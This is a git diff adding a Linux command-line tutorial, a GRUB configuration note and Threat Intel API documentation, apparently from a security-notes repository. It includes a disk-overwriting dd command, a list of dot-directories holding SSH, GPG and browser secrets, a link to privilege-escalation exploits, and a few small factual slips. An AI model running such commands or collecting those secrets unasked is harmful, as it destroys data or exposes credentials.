bring back to the foreground, we type **fg**. + +* To get the list of running jobs in the shell, we type **jobs**. Each job has a **job ID** which can be used with the percent sign **%** to **bg**, **fg** or **kill** (described below). + + +### ps + +* To see the processes that were not started from your current session you can run: + +``` +$ ps x +``` + +* To see your processes and those belonging to other users: + +``` +$ ps aux +``` + +* To list all zombie processes you can either do: + +``` +$ ps aux | grep -w Z +``` + +or + +``` +$ ps -e +``` + + +### top + +* Another useful command is **top** (table of processes). It tells you which programs are using the most of memory or CPU: + +``` +$ top +``` + +* I particularly like [htop](http://hisham.hm/htop/) over the top, which needs to be installed if you want to use it. + +### kill + +* To stop running a command you can use **kill**. This will send a message called **signal** to the program. There are [64 different signals](http://www.linux.org/threads/kill-commands-and-signals.4423/), some having distinct meanings from *stop running*: + +``` +$ kill +``` + +* A user can kill all her process but not another user's process or processes the System is using (unless it's root). + +* The default signal sent by kill is **SIGTERM** (15), telling the program that you want it to quit. This is just a request, and the program can choose to ignore it. **SIGHUP** (1) is a less secure way of killing the process. + +* The signal **SIGKILL** is mandatory and cause the immediate end of the process. The only exception is if the program is in the middle of making a request to the operating system, *i.e.,* a system call). This is because the request needs to finish first. This is the most **unsafe** way to kill the process (check [this post from Stripe's Game Day](https://stripe.com/blog/game-day-exercises-at-stripe)). **SIGKILL** is the 9th signal in the list, and it is usually sent with: + +``` +$ kill -9 +``` + +* To know all the process with their PID, run: + +``` +$ ps -A +``` + +* To find the PID of a specific process: + +``` +$ pidof subl +``` +or + +``` +$ ps aux | grep subl +``` + +or even + +``` +$ pgrep subl +``` + +* Pressing CTRL-C is a simpler way to tell the program to quit, and it sends a message called **SIGINT**. You can also specify the PID as an argument to kill. + +* Another way of killing process: + +``` +$ pkill +``` + + +### uptime + +* Another great command is **uptime**, which shows how long the system has been running, with a measure of its load average as well: + +``` +$ uptime +``` + +### nice and renice + +* Finally, you can change processes priority using ```nice``` (runs a program with modified scheduling priority) and ```renice```(alter the priority of running processes). + + +--- +## Environment Variables + +* *Environment variables* are several dynamic named values in the operating system that can be used in running processes. + + +### set and env +* You can see the *environment variables and configuration* in your system with: + +``` +$ set +``` +or +``` +$ env +``` + +### export and echo +* The value of an environment variable can be changed with: + +``` +$ export VAR= +``` + +* The value can be checked with: + +``` +$ echo $VAR +``` + +* The **PATH** (search path) is the list of directories that the shell looks in to try to find a particular command. For example, when you type ```ls``` it will look at ```/bin/ls```. The path is stored in the variable **PATH**, which is a list of directory names separated by colons, and it's coded inside **./bashrc**. To export a new path you can do: + +``` +$ export PATH=$PATH:/ +``` + +### Variable in Scripts + +* Inside a running shell script, there are pseudo-environment variables that are called with **$1**, **$2**, etc., for individual arguments that were passed to the script when it was run. In addition, **$0** is the name of the script and **$@** is for the list of all the command-line arguments. + + + + + +--- +## The "~/." Files (dot-files) + +* The leading dot in a file is used as an indicator not to list these files typically, but only when they are specifically requested. The reason is that, generally, dot-files are used to store configuration and sensitive information for applications. + +### ~/.bashrc + +* **~/.bashrc** contains scripts and variables that are executed when Bash is invoked. + +* It's a good experience to customize your **~/.bashrc**. Just google for samples, or take a look at this [site dedicated for sharing dot-files](http://dotfiles.org), or at [mine](https://github.com/bt3gl/Dotfiles-and-Bash-Examples/blob/master/configs/bashrc). Don't forget to ```source``` your **./bashrc** file every time you make a change (opening a new terminal has the same effect): + +``` +$ source ~/.bashrc +``` + +### Sensitive dot-files + +* If you use cryptographic programs such as [ssh](http://en.wikipedia.org/wiki/Secure_Shell) and [gpg](https://www.gnupg.org/), you'll find that they keep a lot of information in the directories **~/.ssh** and **~/.gnupg**. + +* If you are a *Firefox* user, the **~/.mozilla** directory contains your web browsing history, bookmarks, cookies, and any saved passwords. + +* If you use [Pidgin](http://pidgin.im/), the **~/.purple** directory (after the name of [the IM library](https://developer.pidgin.im/wiki/WhatIsLibpurple)) contains private information. This includes sensitive cryptographic keys for users of cryptographic extensions to Pidgin such as [Off-the-Record](https://otr.cypherpunks.ca/). + + +--- +## File Descriptors + +* A **file descriptor** (FD) is a number indicator for accessing an I/O resource. The values are the following: + * fd 0: stdin (standard input). + * fd 1: stdout (standard output). + * fd 2: stderr (standard error). + +* This naming is used for manipulation of these resources in the command line. For example, to send an **input** to a program, you use **<**: + +``` +$ < +``` + +* To send a program's **output** somewhere else than the terminal (such as a file), you use **>**. For example, to just discard the output: + +``` +$ > /dev/null +``` + +* To send the program's error messages to a file you use the file descriptor 2: + +``` +$ 2> +``` + +* To send the program's error messages to the same place where **stdout** is going, *i.e.* merging it into a single stream (this works great for pipelines): + +``` +$ 2>&1 +``` + +---- +## File Permissions + +* Every file/directory in Linux is said to belong to a particular **owner** and a particular **group**. Files also have permissions stating what operations are allowed. + + +### chmod +* A resource can have three permissions: read, write, and execute: + + * For a file resource, these permission are: read the file, to modify the file, and to run the file as a program. + + * For a directory, these permissions are the ability to list the directory's contents, to create and delete files inside the directory, and to access files within the directory. + +* To change the permissions you use the command ```chmod```. + + +### chown and chgrp + +* Unix permissions model does not support *access control lists* allowing a file to be shared with an enumerated list of users for a particular purpose. Instead, the admin needs to put all the users in a group and make the file to belong to that group. File owners cannot share files with an arbitrary list of users. + + +* There are three agents relate to the resource: user, group, and all. Each of them can have separated permissions to read, write, and execute. + +* To change the owner of a resource you use ```chown```. There are two ways of setting permissions with chmod: + + * A numeric form using octal modes: read = 4, write = 2, execute = 1, where you multiply by user = x100, group = x10, all = x1, and sum the values corresponding to the granted permissions. For example 755 = 700 + 50 + 5 = rwxr-xr-x: ``` $ chmod 774 ``` + + * An abbreviated letter-based form using symbolic modes: u, g, or a, followed by a plus or minus, followed by a letter r, w, or x. This means that u+x "grants user execute permission", g-w "denies group write permission", and a+r "grants all read permission":```$ chmod g-w ```. + + +* To change the group you use ```chgrp```, using the same logic as for chmod. + + + +* To see the file permissions in the current folder, type: + +``` +$ ls -l +``` + +* For example, ```-rw-r--r--``` means that it is a file (-) where the owner has read (r) and write (w) permissions, but not execute permission (-). + + +--- + +# Shell Commands and Tricks + +## Reading Files + +### cat + +* Prints the content of a file in the terminal: + +``` +$ cat +``` + +### tac + +* Prints the inverse of the content of a file in the terminal (starting from the bottom): + +``` +$ tac +``` + +### less and more + +* Both print the content of a file, but adding page control: + +``` +$ less +$ more +``` + +### head and tail +* To read 20 lines from the begin: + +``` +$ head -20 +``` + +* To read 20 lines from the bottom: + +``` +$ tail -10 +``` + +### nl + +* To print (cat) a file with line numbers: + +``` +$ nl +``` + +### tee + +* To save the output of a program and see it as well: + +``` +$ | tee -a +``` + +### wc + +* To print the length and number of lines of a file: + +``` +$ wc +``` + + + +--- +## Searching inside Files + +### diff and diff3 + +* **diff** can be used to compare files and directories. Useful flags include: **-c** to list differences, **-r** to recursively compare subdirectories, **-i** to ignore case, and **-w** to ignore spaces and tabs. + +* You can compare three files at once using **diff3**, which uses one file as the reference basis for the other two. + + +### file + +* The command **file** shows the real nature of a file: + +``` +$ file requirements.txt +requirements.txt: ASCII text +``` + +### grep +* **grep** finds matches for a particular search pattern. The flag **-l** lists the files that contain matches, the flag **-i** makes the search case insensitive, and the flag **-r** searches all the files in a directory and subdirectory: + +``` +$ grep -lir +``` + +* For example, to remove lines that are not equal to a word: + +``` +$ grep -xv +``` + +--- +## Listing or Searching for Files + + +### ls + +* **ls** lists directory and files. Useful flags are **-l** to list the permissions of each file in the directory and **-a** to include the dot-files: + +``` +$ ls -la +``` + +* To list files sorted by size: + +``` +$ ls -lrS +``` + +* To list the names of the ten most recently modified files ending with .txt: + +``` +$ ls -rt *.txt | tail -10 +``` + + +### tree + +* The **tree** command lists contents of directories in a tree-like format. + + +### find + +* To find files in a directory: + +``` +$ find -name +``` + +### which + +* To find binaries in PATH variables: + +``` +$ which ls +``` + +### whereis + +* To find any file in any directory: + +``` +$ whereis +``` + +### locate + +* To find files by name (using a database): + +``` +$ locate +``` + +* To test if a file exists: + +``` +$ test -f +``` + +--- +## Modifying Files + +### true + +* To make a file empty: +``` +$ true > +``` + +### tr + +* **tr** takes a pair of strings as arguments and replaces, in its input, every letter that occurs in the first string by the corresponding characters in the second string. For example, to make everything lowercase: + +``` +$ tr A-Z a-z +``` + +* To put every word in a line by replacing spaces with newlines: + +``` +$ tr -s ' ' '\n' +``` + +* To combine multiple lines into a single line: + + +``` +$ tr -d '\n' +``` + +* **tr** doesn't accept the names of files to act upon, so we can pipe it with cat to take input file arguments (same effect as ```$ < ```): + +``` +$ cat "$@" | tr +``` + + + +### sort + +* Sort the contents of text files. The flag **-r** sort backward, and the flag **-n** selects numeric sort order (for example, without it, 2 comes after 1000): + +``` +$ sort -rn +``` + +* To output a frequency count (histogram): + +``` +$ sort | uniq -c | sort -rn +``` + +* To chose random lines from a file: + +``` +$ sort -R | head -10 +``` + +* To combine multiple files into one sorted file: + +``` +$ sort -m +``` + +### uniq + + +* **uniq** remove *adjacent* duplicate lines. The flag **-c** can include a count: + +``` +$ uniq -c +``` + +* To output only duplicate lines: + +``` +$ uniq -d +``` + +### cut + +* **cut** selects particular fields (columns) from structured text files (or particular characters from each line of any text file). The flag **-d** specifies what delimiter should be used to divide columns (default is tab), the flag **-f** specifies which field or fields to print and in what order: + +``` +$ cut -d ' ' -f 2 +``` + +* The flag **-c** specifies a range of characters to output, so **-c1-2** means to output only the first two characters of each line: + +``` +$ cut -c1-2 +``` + +### join +* **join** combines multiple file by common delimited fields: + +``` +$ join +``` + + + + +---- +## Creating Files and Directories + +### mkdir + +* **mkdir** creates a directory. A useful flag is **-p** which creates the entire path of directories (in case they don't exist): + +``` +$ mkdir -p +``` + + +### cp + +* Copying directory trees is done with **cp**. The flag **-a** is used to preserve all metadata: + +``` +$ cp -a +``` + +* Interestingly, commands enclosed in **$()** can be run and then the output of the commands is substituted for the clause and can be used as a part of another command line: + +``` +$ cp $(ls -rt *.txt | tail -10) +``` + + +### pushd and popd + +* The **pushd** command saves the current working directory in memory so it can be returned to at any time, optionally changing to a new directory: + +``` + $ pushd ~/Desktop/ +``` + +* The **popd** command returns to the path at the top of the directory stack. + +### ln + +* Files can be linked with different names with the **ln**. To create a symbolic (soft) link you can use the flag **-s**: + +``` +$ ln -s +``` + + +### dd + +* **dd** is used for disk-to-disk copies, being useful for making copies of raw disk space. For example, to back up your [Master Boot Record](http://en.wikipedia.org/wiki/Master_boot_record) (MBR): + +``` +$ dd if=/dev/sda of=sda.mbr bs=512 count=1 +``` + +* To use **dd** to make a copy of one disk onto another: + +``` +$ dd if=/dev/sda of=/dev/sdb +``` + + + +---- +## Network and Admin + +### du + +* **du** shows how much disk space is used for each file: + +``` +$ du -sha +``` + +* To see this information sorted and only the ten largest files: + +``` +$ du -a | sort -rn | head -10 +``` + +* To determine which subdirectories are taking a lot of disk space: + +``` +$ du --max-depth=1 | sort -k1 -rn +``` + +### df + +* **df** shows how much disk space is used on each mounted filesystem. It displays five columns for each filesystem: the name, the size, how much is used, how much is available, percentage of use, and where it is mounted. Note the values won't add up because Unix filesystems have **reserved** storage blogs which only the root user can write to. + +``` +$ df -h +``` + + + +### ifconfig + +* You can check and configure your network interface with: + +``` +$ ifconfig +``` + +* In general, you will see the following devices when you issue **ifconfig**: + + * ***eth0***: shows the Ethernet card with information such as: hardware (MAC) address, IP address, and the network mask. + + * ***lo***: loopback address or localhost. + + +* **ifconfig** is supposed to be deprecated. See [my short guide on ip-netns](https://coderwall.com/p/uf_44a). + + +* A good trick is to change the IP address, [netmask](http://en.wikipedia.org/wiki/Subnetwork) and broadcast address for your network interface: + +``` +$ ifconfig eth0 192.168.1.115 netmask 255.255.255.0 broadcast 192.168.1.255 +``` + +### dhclient + +* Linux has a DHCP server that runs a daemon called ```dhcpd```, assigning IP address to all the systems on the subnet (it also keeps logs files): + +``` +$ dhclient +``` + +### dig + + +* **dig** is a DNS lookup utility (similar to ```dnslookup``` in Windows). + +### netstat + + +* **netstat** prints the network connections, routing tables, interface statistics, among others. Useful flags are **-t** for TCP, **-u** for UDP, **-l** for listening, **-p** for program, **-n** for numeric. For example: + +``` +$ netstat -s +``` + +* To display all open network ports: + +``` +$ netstat -tulpn +``` + +* Display all TCP sockets: + +``` +$ netstat -nat +``` + +* Display all UDP sockets: + +``` +$ netstat -nau +``` + +* View established connections only: + +``` +$ netstat -natu | grep 'ESTABLISHED' +``` + + +### ss + + +* **ss** is used to dumps socket (network connection) statistics. + +* It can display stats for [PACKET sockets, TCP sockets, UDP sockets, DCCP sockets, RAW sockets, Unix domain sockets, and more](http://www.cyberciti.biz/tips/linux-investigate-sockets-network-connections.html). + + +``` +$ ss -s +``` + +* To display all open network ports: + +``` +$ ss -l +``` + +* To display all TCP sockets: + +``` +$ ss -t -a +``` + + +* To display all UCP sockets: + +``` +$ ss -u -a +``` + + +### tcptrack + +* **tcptrack** displays information about TCP connections it sees on a network and displays bandwidth usage on some interface by a host. + +``` +$ tcptrack -i eth0 +``` + +### netcat, telnet and ssh + +* To connect to a host server, you can use **netcat** (nc) and **telnet**. To connect under an encrypted session, **ssh** is used. For example, to send a string to a host at port 3000: + +``` +$ echo 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e | nc localhost 3000 +``` + +* To telnet to localhost at port 3000: + +``` +$ telnet localhost 3000 +``` + + + +### lsof + +* **lsof** lists open files (remember that everything is considered a file in Linux): + +``` +$ lsof +``` + +* To see open TCP ports: + +``` +$ lsof | grep TCP +``` + +* To see IPv4 port(s): + +``` +$ lsof -Pnl +M -i4 +``` + +* To see IPv6 listing port(s): + +``` +$ lsof -Pnl +M -i6 +``` + + + +--- + +## Useful Stuff + +### echo + + +* **echo** prints its arguments as output. It can be useful for pipelining, and in this case, you use the flag **-n** not to output the trailing new line: +``` +$ echo -n +``` + +* **echo** can be useful to generate commands inside scripts (remember the discussion about file descriptor): + +``` +$ echo 'Done!' >&2 +``` + +* Or to find shell environment variables (remember the discussion about them): + +``` +$ echo $PATH +``` + +* For example, we can send the current date information to a file: + +``` +$ echo Completed at $(date) >> log.log +``` + +### MD5 and SHA Hashing + +* You can calculate hashes straight from the command line: + +``` +$ echo -n awesome | md5sum +$ echo -n awesome | sha1sum +03d67c263c27a453ef65b29e30334727333ccbcd - +$ echo -n awesome | sha256sum +705db0603fd5431451dab1171b964b4bd575e2230f40f4c300d70df6e65f5f1c - +``` + +### bc + +* A calculator program is given by the command **bc** The flag **-l** stands for the standard math library: + +``` +$ bc -l +``` + +* For example, we can make a quick calculation with: +``` +$ echo '2*15454' | bc +30908 +``` + + + +### w, who, finger, users + + +* To find information about logged users you can use the commands **w, who, finger**, and **users**. + + + + + +--- +## Regular Expression 101 + +* **Regular expressions** (regex) are sequences of characters that forms a search pattern for use in pattern matching with strings. + +* Letters and numbers match themselves. Therefore, 'awesome' is a regular expression that matches 'awesome'. + +* The main rules that can be used with **grep** are: + * ```.``` matches any character. + * ```*``` any number of times (including zero). + * ```.*``` matches any string (including empty). + * ```[abc]``` matches any character a or b or c. + * ```[^abc]``` matches any character other than a or b or c. + * ```^``` matches the beginning of a line. + * ```$``` matches the end of a line. + +* For example, to find lines in a file that begin with a particular string you can use the regex symbol **^**: + +``` +$ grep ^awesome +``` + +* Additionally, to find lines that end with a particular string you can use **$**: + +``` +$ grep awesome$ +``` + +* As an extension, **egrep** uses a version called *extended regular expresses* (EREs) which include things such: + * ```()``` for grouping + * ```|``` for or + * ```+``` for one or more times + * ```\n``` for back-references (to refer to an additional copy of whatever was matched before by parenthesis group number n in this expression). + +* For instance, you can use ``` egrep '.{12}'```to find words of at least 12 letters. You can use ```egrep -x '.{12}'``` to find words of exactly twelve letters. + + + + +--- + +## Awk and Sed + +* **awk** is a pattern scanning tool while **sed** is a stream editor for filtering and transform text. While these tools are extremely powerful, if you have knowledge of any very high-level languages such as Python or Ruby, you don't necessarily need to learn them. + +### sed + +* Let's say we want to replace every occurrence of *mysql* and with MySQL (Linux is case sensitive), and then save the new file to . We can write a one-line command that says "search for the word mysql and replace it with the word MySQL": + +``` +$ sed s/mysql/MySQL/g > +``` + +* To replace any instances of a period followed by any number of spaces with a period followed by a single space in every file in this directory: + +``` +$ sed -i 's/\. */. /g' * +``` + +* To pass an input through a stream editor and then quit after printing the number of lines designated by the script's first parameter: + +``` +$ sed ${1}q +``` + + + + +---- + +# Some More Advanced Stuff + + +## Scheduling Recurrent Processes + + +### at +* A very cute bash command is **at**, which allows you to run processes later (ended with CTRL+D): + +``` +$ at 3pm +``` + + +### cron +* If you have to run processes periodically, you should use **cron**, which is already running as a [system daemon](http://en.wikipedia.org/wiki/Daemon_%28computing%29). You can add a list of tasks in a file named **crontab** and install those lists using a program also called **crontab**. **cron** checks all the installed crontab files and run cron jobs. + + +* To view the contents of your crontab, run: + +``` +$ crontab -l +``` + +* To edit your crontab, run: + +``` +$ crontab -e +``` + +* The format of the cron job is *min, hour, day, month, dow* (day of the week, where Sunday is 0). They are separated by tabs or spaces. The symbol * means any. It's possible to specify many values with commas. + +* For example, to run a backup every day at 5am, edit your crontab to: + +``` +0 5 * * * /home/files/backup.sh +``` + +* Or if you want to remember some birthday, you can edit your crontab to: + +``` +* * 16 1 * echo "Remember Mom's bday!" +``` + + +--- +## rsync + +* **rsync** performs file synchronization and file transfer. It can compress the data transferred using *zlib* and can use SSH or [stunnel](https://www.stunnel.org/index.html) to encrypt the transfer. + +* **rsync** is very efficient when recursively copying one directory tree to another because only the differences are transmitted over the network. + +* Useful flags are: **-e** to specify the SSH as remote shell, **-a** for archive mode, **-r** for recurse into directories, and **-z** to compress file data. + +* A very common set is **-av** which makes **rsync** to work recursively, preserving metadata about the files it copies, and displaying the name of each file as it is copied. For example, the command below is used to transfer some directory to the **/planning** subdirectory on a remote host: + +``` +$ rsync -av :/planning +``` + + + +---- +## File Compression + +* Historically, **tar** stood for tape archive and was used to archive files to a magnetic tape. Today **tar** is used to allow you to create or extract files from an archive file, often called a **tarball**. + +* Additionally you can add *file compression*, which works by finding redundancies in a file (like repeated strings) and creating a more concise representation of the file's content. The most common compression programs are **gzip** and **bzip2**. + +* When issuing **tar**, the flag **f** must be the last option. No hyphen is needed. You can add **v** as verbose. + +* A simple tarball is created with the flag **c**: + +``` +$ tar cf +``` + +* To extract a tarball you use the flag **x**: + +``` +$ tar xf +``` + +### gzip + + +* **gzip** is the most frequently used Linux compression utility. To create the archive and compress with gzip you use the flag **z**: + +``` +$ tar zcf +``` + +* You can directly work with gzip-compressed files with ```zcat, zmore, zless, zgrep, zegrep```. + +### bzip2 + +* **bzip2** produces files significantly smaller than those produced by gzip. To create the archive and compress with bz2 you use the flag **j**: + +``` +$ tar jcf +``` + +### xz + +* **xz** is the most space efficient compression utility used in Linux. To create the archive and compress with xz: + +``` +$ tar Jcf +``` + + +---- +## Logs + +* Standard logging facility can be found at ```/var/log```. For instance: + * ```/var/log/boot.log``` contains information that is logged when the system boots. + * ```/var/log/auth.log``` contains system authorization information. + * ```/var/log/dmesg``` contains kernel ring buffer information. + + +* The file ```/etc/rsyslog.conf``` controls what goes inside the log files. + +* The folder ```/etc/services``` is a plain ASCII file providing a mapping between friendly textual names for internet services, and their underlying assigned port numbers and protocol types. To check it: + +``` +$ cat /etc/services +$ grep 110 /etc/services +``` + +* To see what your system is logging: + +``` +$ lastlog +``` + + +----- +## /proc and inodes + +* If the last link to a file is deleted but this file is open in some editor, we can still retrieve its content. This can be done, for example, by: + 1. attaching a debugger like **gdb** to the program that has the file open, + + 2. commanding the program to read the content out of the file descriptor (the **/proc** filesystem), copying the file content directly out of the open file descriptor pseudo-file inside **/proc**. + +* For example, if one runs ```$ dd if=/dev/zero of=trash & sleep 10; rm trash```, the available disk space on the system will continue to go downward (since more contents get written into the file by which **dd** is sending its output). + +* However, the file can't be seen everywhere in the system! Only killing the **dd** process will cause this space to be reclaimed. + +* An **index node** (inode) is a data structure used to represent a filesystem object such as files or directories. The true name of a file, even when it has no other name, is in fact its *inode number* within the filesystem it was created, which can be obtained by +``` +$ stat +``` +or +``` +$ ls -i +``` + +* Creating a hard link with **ln** results in a new file with the same *inode number* as the original. Running *rm* won't affect the other file: + +``` +$ echo awesome > awesome +$ cp awesome more-awesome +$ ln awesome same-awesome +$ ls -i *some +7602299 awesome +7602302 more-awesome +7602299 same-awesome +``` + +---- +## Text, Hexdump, and Encodings + +* A Linux text file contains lines consisting of zero or more text characters, followed by the **newline character** (ASCII 10, also referred to as hexadecimal 0x0A or '\n'). + +* A text with a single line containing the word 'Hello' in ASCII would be 6 bytes (one for each letter, and one for the trailing newline). For example, the text below: + +``` +$ cat text.txt +Hello everyone! +Linux is really cool. +Let's learn more! +``` + +is represented as: + +``` +$ hexdump -c < text.txt +0000000 H e l l o e v e r y o n e ! \n +0000010 L i n u x i s r e a l l y +0000020 c o o l . \n L e t ' s l e a r +0000030 n m o r e ! \n +0000038 +``` + +* The numbers displayed at left are the hexadecimal byte offsets of each output line in the file. + +* Unlike text files on other operating systems, Linux files do not end with a special end-of-file character. + + +* Linux text files were traditionally always interpreted as **ASCII**. In ASCII, each character is a single byte, the ASCII standard as such defines exactly **128 characters** from **ASCII 0 to ASCII 127**. Some of them are non-printable (such as a newline). The printable starts at **32**. In that case, **ISO 8859** standards were extensions to ASCII where the character positions **128 to 255** are given a foreign-language interpretation. + +* Nowadays, Linux files are most often interpreted as **UTF-8**, which is an encoding of **Unicode**, a character set standard able to represent a very large number of languages. + +* For East Asian languages, **UTF-8 **chars are interpreted with **3 bytes** and **UTF-16** chars are interpreted with **2 bytes**. For western languages (such as German, for example), **UTF-16** characters are interpreted with **2 bytes**, and all the regular characters have **00** in front of it. + +* In **UTF-16**, sentences start with two bytes **fe ff** (decimal 254 255) which don't encode as any part of the text. These are the **Unicode byte order mark** (BOM), which guards against certain kinds of encoding errors [1]. + + +* Linux has a command to translate between character sets: + +``` +$ recode iso8859-1..utf-8 +``` + +* This is useful if you see a **mojibake**, which is a character set encoding mismatch bug. + + +* There are only two mandatory rules about characters that can't appear in the filename: null bytes (bytes that have numeric value zero) and forward slashes **/**. + + + + +---- + +# Extra Juice: (pseudo)-Random Tricks + +## Creating Pseudo-Random Passwords + +* Add this to your **~/.bashrc**: + +``` +genpass() { + local p=$1 + [ "$p" == "" ] && p=16 + tr -dc A-Za-z0-9_ < /dev/urandom | head -c ${p} | xargs +} +``` + +* Then, to generate passwords, just type: + +``` +$ genpass +``` + +* For example: + +```sh +$ genpass +dIBObynGX9epYogz +$ genpass 8 +c_yhmaXt +$ genpass 12 +FZI2wz2LzyVQ +$ genpass 14 +ZEfgQvpY4ixePt +``` + +--- + +## Most Common words plus Frequency + + +* We can use the commands we learned to build a script that prints the most common words plus their frequency: + +``` +tr -cs A-Za-z '\n' | +tr A-Z a-z | +sort | +uniq -c | +sort -rn | +sed ${1}q +``` + +* This is the same as splitting and tokenizing the file using Python: + +``` +import sys, collections +def common_words(n): + return collections.Counter(sys.stdin.read().lower().split()).most_common(n) +``` + + +--- +## Password Asterisks + +* By default, when you type your password in the terminal you should see no feedback. If you would like to see asterisks instead, edit: + +``` +$ sudo visudo +``` + +to have the value: + +``` +Defaults pwfeedback +``` + + +---- +## imagemagick + +* You can create a gif file from terminal with ***imagemagick***: + +``` +$ mogrify -resize 640x480 *.jpg +$ convert -delay 20 -loop 0 *.jpg myimage.gif +``` + +--- +## Easy access to the History + + +* Type ```!!``` to run the last command in the history, ```!-2``` for the command before that, and so on. + + + + +----------------- + +# Further References: + +- Unix: Culture and Command-Line, Seth Schoen + +- [Understand STDERROR, STDOUT, STDIN](http://null-byte.wonderhowto.com/how-to/hack-like-pro-linux-basics-for-aspiring-hacker-part-16-stdin-stdout-stderror-0150693/). + +- [Introduction to filesystems](http://www.howtogeek.com/196051/htg-explains-what-is-a-file-system-and-why-are-there-so-many-of-them). + +- [Guide to Crontab](http://null-byte.wonderhowto.com/how-to/hack-like-pro-linux-basics-for-aspiring-hacker-part-18-scheduling-jobs-0154969/) + +- [10 Useful scp commands](http://www.tecmint.com/scp-commands-examples/) + +- [Bash shortcuts for productivity](http://www.skorks.com/2009/09/bash-shortcuts-for-maximum-productivity/) + +- [Linux Bash Shell Cheat Sheet](http://cli.learncodethehardway.org/bash_cheat_sheet.pdf) + +- [Rise of Linux, a Hacker History](http://www.linuxuser.co.uk/features/rise-of-linux-a-hackers-history) + +- [9 commands to check hard disk partitions and disk space](http://www.binarytides.com/linux-command-check-disk-partitions/) + +- [Checking Memory Usage in Linux](http://www.tecmint.com/check-memory-usage-in-linux/) + +- [Usermode commands example](http://www.tecmint.com/usermod-command-examples/) + + [1] Encoding is a problem between Python 2 and Python 3: + + - In Python 2, a UTF-8 environment, len(" 美 國 ") is 6 and "美國 "[0] is a string containing the byte 0xe7 (which is the first byte of the three that encode 美 in UTF-8). + + - In Python 3, len("美國") is 2 (it's two Unicode characters), and " 美國"[0] is the string "美" (the first character in the string). + + - Each version of Python provides a data type that produces the other version's default behavior (the Unicode type in Python 2 and the bytes type in Python 3). + + +---------------------- + + +# Hacking Tools + ## Privilege Escalation * [Unix Privilege Escalation Exploits by years](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack). diff --git a/Linux_Hacking/intro_GRUB.md b/Linux_Hacking/intro_GRUB.md new file mode 100644 index 0000000..4f4bd71 --- /dev/null +++ b/Linux_Hacking/intro_GRUB.md @@ -0,0 +1,37 @@ +# Grub Configuration + +## Understanding MBR and EFI + +BIOS/MBR is an older partition table type also referred to as Legacy mode. Nowadays, UEFI is in most of the new computer (especially those that came with W8 or W8.1 pre-installed). UEFI always use the gpt partition table type. + +To find out each one your computer uses, you can boot into your computers Bios/firmware. Besides, to see if it is UEFI: + +``` +$ efibootmgr +``` + +In a UEFI install, the ```grub.cfg``` file belongs in ```/boot/efi/EFI/fedora/grub.cfg```. In a msdos/MBR install, ```grub.cfg``` belongs in ```/boot/grub2/grub.cfg```. + +Extra: to see your partitions, you can type: +``` +$ gdisk -l /dev/sda +``` + +## Modifying Grub Options + +Edit ```/etc/default/grub```. For example, setting: + +``` +GRUB_DEFAULT="0" +``` + +After that, type the ```grub2-mkconfig``` command. In a MBR boot: + +``` +$ grub2-mkconfig -o /boot/grub2/grub.cfg +``` + +In an EFI boot: +``` +$ grub2-mkconfig -o /boot/efi/EFI/fedora/grub.cfg +``` \ No newline at end of file diff --git a/Network_and_802.11/DNS_recon.md b/Network_and_802.11/DNS_recon.md new file mode 100644 index 0000000..3588f1d --- /dev/null +++ b/Network_and_802.11/DNS_recon.md @@ -0,0 +1,740 @@ +# Introducing Threat Intel + + +[Threat Intel](https://github.com/Yelp/threat_intel) is a set of Threat Intelligence APIs that can be used by security developers and analysts for incident response. Additionally, it contains wrappers for: + +* OpenDNS Investigate API +* VirusTotal API v2.0 +* ShadowServer API + +---- + +### OpenDNS Investigate API + +[OpenDNS Investigate](https://investigate.opendns.com/) provides an API that +allows querying for: + + * Domain categorization + * Security information about a domain + * Co-occurrences for a domain + * Related domains for a domain + * Domains related to an IP + * Domain tagging dates for a domain + * DNS RR history for a domain + * WHOIS information + - WHOIS information for an email + - WHOIS information for a nameserver + - Historical WHOIS information for a domain + * Latest malicious domains for an IP + +To use the Investigate API wrapper import `InvestigateApi` class from `threat_intel.opendns` module: + +```python +from threat_intel.opendns import InvestigateApi +``` + +To initialize the API wrapper, you need the API key: + +```python +investigate = InvestigateApi("") +``` + +You can also specify a file name where the API responses will be cached in a JSON file, +to save you the bandwidth for the multiple calls about the same domains or IPs: + +```python +investigate = InvestigateApi("", cache_file_name="/tmp/cache.opendns.json") +``` + +#### Domain categorization + +Calls `domains/categorization/?showLabels` Investigate API endpoint. +It takes a list (or any other Python enumerable) of domains and returns +the categories associated with these domains by OpenDNS along with a [-1, 0, 1] score, where -1 is a malicious status. + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +investigate.categorization(domains) +``` + +will result in: + +``` +{ + "baidu.com": {"status": 1, "content_categories": ["Search Engines"], "security_categories": []}, + "google.com": {"status": 1, "content_categories": ["Search Engines"], "security_categories": []}, + "bibikun.ru": {"status": -1, "content_categories": [], "security_categories": ["Malware"]} +} +``` + +#### Security information about a domain + +Calls `security/name/` Investigate API endpoint. +It takes any Python enumerable with domains, e.g., list, and returns several security parameters +associated with each domain. + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +investigate.security(domains) +``` + +will result in: + +``` +{ + "baidu.com": { + "found": true, + "handlings": { + "domaintagging": 0.00032008666962131285, + "blocked": 0.00018876906157154347, + "whitelisted": 0.00019697641207465407, + "expired": 2.462205150933176e-05, + "normal": 0.9992695458052232 + }, + "dga_score": 0, + "rip_score": 0, + + .. + + } +} +``` + +#### Co-occurrences for a domain + +Calls `recommendations/name/` Investigate API endpoint. +Use this method to find out a list of co-occurrence domains (domains that are being accessed by the same users within a small window of time) to the one given in a list, or any other Python enumerable. + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +investigate.cooccurrences(domains) +``` + +will result in: + +``` +{ + "baidu.com": { + "found": true, + "pfs2": [ + ["www.howtoforge.de", 0.14108563836506008], + } + + .. + +} +``` + +#### Related domains for a domain + +Calls `links/name/` Investigate API endpoint. +Use this method to find out a list of related domains (domains that have been frequently seen requested around a time window of 60 seconds, but that are not associated with the given domain) to the one given in a list, or any other Python enumerable. + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +investigate.related_domains(domains) +``` + +will result in: + +``` +{ + "tb1": [ + ["t.co", 11.0], + ] + + .. + +} +``` + +#### Domain tagging dates for a domain + +Calls `domains/name/` Investigate API endpoint. + +Use this method to get the date range when the domain being queried was a part of the OpenDNS block list and how long a domain has been in this list + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +investigate.domain_tag(domains) +``` + +will result in: + +``` +{ + 'category': u'Malware', + 'url': None, + 'period': { + 'begin': u'2013-09-16', + 'end': u'Current' + } + + 